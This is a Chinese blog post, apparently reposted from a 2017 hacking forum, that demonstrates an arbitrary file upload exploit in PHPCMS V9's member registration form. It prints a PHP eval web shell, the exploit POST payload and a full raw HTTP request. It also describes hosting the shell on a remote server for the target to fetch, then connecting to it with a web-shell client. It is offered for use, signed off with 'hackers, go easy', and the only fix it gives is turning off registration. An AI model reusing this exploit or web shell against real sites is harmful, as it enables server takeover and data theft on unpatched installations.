php168上传漏洞,Phpcms_V9任意文件上传漏洞的利用以及小小的分析

博主分享了PHPCMS系统中发现的一个0day漏洞,展示了如何通过注册表单POST提交执行代码,包括本地文件读取和远程代码注入。通过Burp工具验证,虽然回显失败但实际已写入。建议关闭注册功能并期待官方补丁。
摘要由CSDN通过智能技术生成

本帖最后由 小爱_Joker 于 2017-4-10 10:05 编辑

去年的漏洞复现了 本地环境搭建  在官方下载的最新版本phpcms源码我冒着生命危险 放出的0day

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ图片20170410171149.jpg (14.64 KB, 下载次数: 81)

2017-4-10 17:11 上传

各位看完后 记得评论下

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410163900.png (56.14 KB, 下载次数: 92)

2017-4-10 16:46 上传

主要是注册哪里 post提交

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410164727.png (58.15 KB, 下载次数: 79)

2017-4-10 16:47 上传

这里我在本地准备一个1.txt文件 我们的一句话

[AppleScript] 纯文本查看 复制代码<?php @eval($_POST[cmd]);?>

0day

[AppleScript] 纯文本查看 复制代码siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=1.txt?.php#.jpg&dosubmit=1&protocol=

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410165025.png (106.1 KB, 下载次数: 89)

2017-4-10 16:50 上传

也可以在远程服务器 放一个文本文件

http://192.168.0.3/phpcms/1.txt

远程服务器 比如 我在www.w3bsafe.cn/1.txt 放一个一句话 txt文件的

改下0day即可

是我本地的文件文件地址 里面有一句话 上面我说了

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410165220.png (35.59 KB, 下载次数: 89)

2017-4-10 16:52 上传

Post提交一下

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410165436.png (82.18 KB, 下载次数: 104)

2017-4-10 16:54 上传

菜刀链接

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410165535.png (55.3 KB, 下载次数: 92)

2017-4-10 16:55 上传

burp操作验证

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410180203.png (97.61 KB, 下载次数: 103)

2017-4-10 18:02 上传

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170410180216.png (19.11 KB, 下载次数: 81)

2017-4-10 18:02 上传

回显操作失败 但是他已经写入进去了

8f3ff2fbfdd7c7c8339951a6542705fa.gif

1.gif (746 KB, 下载次数: 89)

2017-4-10 18:04 上传

[AppleScript] 纯文本查看 复制代码POST /phpcms/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1

Host: 192.168.0.3

Content-Length: 158

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: [url]http://192.168.0.3[/url]

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: application/x-www-form-urlencoded

Referer: [url]http://192.168.0.3/phpcms/index.php?m=member&c=index&a=register&siteid=1[/url]

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: duiqS_admin_username=e2148Lx9jxWqd27zJW60NoZECjpCzY-kJHaDRtsJdNN-D14; duiqS_siteid=7f10PWN8e2aLJ8cDReSbX_NTPYZUwUTTf0QLOMix; duiqS_userid=d73dm3IxOKQZiIl0oDUfv1qRKPN7eYkeRy4xYTe2; duiqS_admin_email=fe549jr0y5NPbP8-awEI3pa2RERM9d6oloN6wm9p0LqSCnT0MqQ69lB8RxYNpA; duiqS_sys_lang=ed63dNwVysDCLfwqVe_ZO7ldqXSRC0O1cpABQ5YimBw-4A; BEEFHOOK=Y2fW9i6P441d2vBvjLkgKjlcdTaAj8URI1T1Z7Wx9nZtMJEcrTkp5o7B0uI7AjQr5RsfoGc8ZtlG8U3F; PHPSESSID=o2l47tha69a46khl82341gc8m0

Connection: close

siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=1.txt?.php#.jpg&dosubmit=1&protocol=

总结:自我感觉 关闭注册  临时解决 =-= 官方会出补丁

结束语:黑阔们轻点. 毕竟这个漏洞刚复现不久  ....

pdf文件

a6527a6e1b57e0b5e0b313df30247628.gif

2017-4-10 17:04 上传

点击文件名下载附件

下载积分: 魔法币 -5

看文章记得评论下 感谢. 拒绝伸手党

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值